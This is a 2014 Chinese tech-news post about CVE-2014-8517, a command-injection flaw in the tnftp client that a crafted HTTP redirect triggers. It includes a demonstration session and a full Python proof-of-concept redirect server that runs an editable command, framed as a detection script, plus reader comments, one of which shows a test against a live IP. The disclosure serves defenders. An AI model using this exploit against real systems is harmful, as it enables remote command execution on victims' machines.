漏洞预警:FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)

蟋蟀哥哥
 蟋蟀哥哥
发布于 2014年10月30日
收藏 50

疫情之下,程序员如何转型?共享数字化转型加速度,就在微软在线技术峰会>>>

10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。

NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp让WEB服务器远程执行恶意命令,并且此漏洞已被编号为CVE-2014-8517 :

a20$ pwd
    /var/www/cgi-bin

a20$ ls -l
    total 4      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
    -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a

a20$ cat redirect
    #!/bin/sh      echo 'Status: 302 Found'      echo 'Content-Type: text/html'      echo 'Connection: keep-alive'      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'      echo

a20$
a20$ ftp http://localhost/cgi-bin/redirect
   Trying ::1:80 ...    ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...    Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36    ADT 2014    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
   BOARD evbarm

a20$

漏洞影响范围及公告

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告:


漏洞检测脚本(请勿用于非法用途)

#!/usr/bin/env python """
Sample OSX/BSD FTP client exploit. Written because ISO policies were doing
my head in. To exploit, edit the value of the cmd variable, then run the
script. To test:

	ftp http://<myserver>/foo

And you should see the command executed.

All wrongs reversed - @stevelord
""" import BaseHTTPServer import sys import socket import urllib

hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir
	server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "\nStopped serving."

解决方案和更详细的内容参见:

http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464 

http://seclists.org/oss-sec/2014/q4/460

[参考信息来源nix-systems-affected-ftp-remote-command-execution-vulnerability]

本站文章除注明转载外,均为本站原创或编译。欢迎任何形式的转载,但请务必注明出处,尊重他人劳动共创开源社区。
转载请注明:文章转载自 OSCHINA 社区 [http://www.oschina.net]
本文标题:漏洞预警:FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)
加载中

最新评论(40

甲第星罗
各位大神 漏洞如何补呢
莲花子
莲花子

引用来自“莲花子”的评论

[root@freebsd /usr/ports/ftp/tnftp]# tnftp "http://101.x.x.x:8000/cgi-bin/|fff"
Requesting http://101.251.196.25:8000/cgi-bin/|fff
Redirected to http://101.251.196.25:8000/cgi-bin/|uname%20-a
Requesting http://101.251.196.25:8000/cgi-bin/|uname%20-a
0 0.00 KiB/s
FreeBSD freebsd 9.1-RELEASE-p5 FreeBSD 9.1-RELEASE-p5 #0: Sat Jul 27 01:01:40 UTC 2013 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386
测试IP给放出来了
莲花子
莲花子
[root@freebsd /usr/ports/ftp/tnftp]# tnftp "http://101.x.x.x:8000/cgi-bin/|fff"
Requesting http://101.251.196.25:8000/cgi-bin/|fff
Redirected to http://101.251.196.25:8000/cgi-bin/|uname%20-a
Requesting http://101.251.196.25:8000/cgi-bin/|uname%20-a
0 0.00 KiB/s
FreeBSD freebsd 9.1-RELEASE-p5 FreeBSD 9.1-RELEASE-p5 #0: Sat Jul 27 01:01:40 UTC 2013 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386
Livenux
Livenux
ubuntu没有受影响嘛~~,只测试了14.04
haitaosoft
haitaosoft

引用来自“无量神通”的评论

@红薯 发新闻注意下格式,文章里的python代码完全乱掉了

引用来自“Raymin”的评论

这个是 Python 的硬伤啊!
粘贴几次缩进就乱了,乱了就搞不清楚逻辑了。
仅此就让我放弃了。。。。
语法上加一个可选的 块结束标志,就能解决问题了,创立者就那么不愿意。。。。
白凡
白凡
这是软件界的世界末日要到了么?
王明明
王明明

引用来自“tao_hunter6”的评论

一个特定ftp客户端软件tnftp的安全性bug被小编直接造谣成了ftp的严重漏洞--真该吊打。就算是用linux,只要ftp的客户端不是tnftp就没事!
确实,因为个是转载的,搜索了一下很多网站内容都一样,只有少数网站把这个漏洞说明白了
首席养猪CEO-丁三石
首席养猪CEO-丁三石
严重标题党,骗评论的。没意思
tao_hunter6
tao_hunter6
一个特定ftp客户端软件tnftp的安全性bug被小编直接造谣成了ftp的严重漏洞--真该吊打。就算是用linux,只要ftp的客户端不是tnftp就没事!
返回顶部
顶部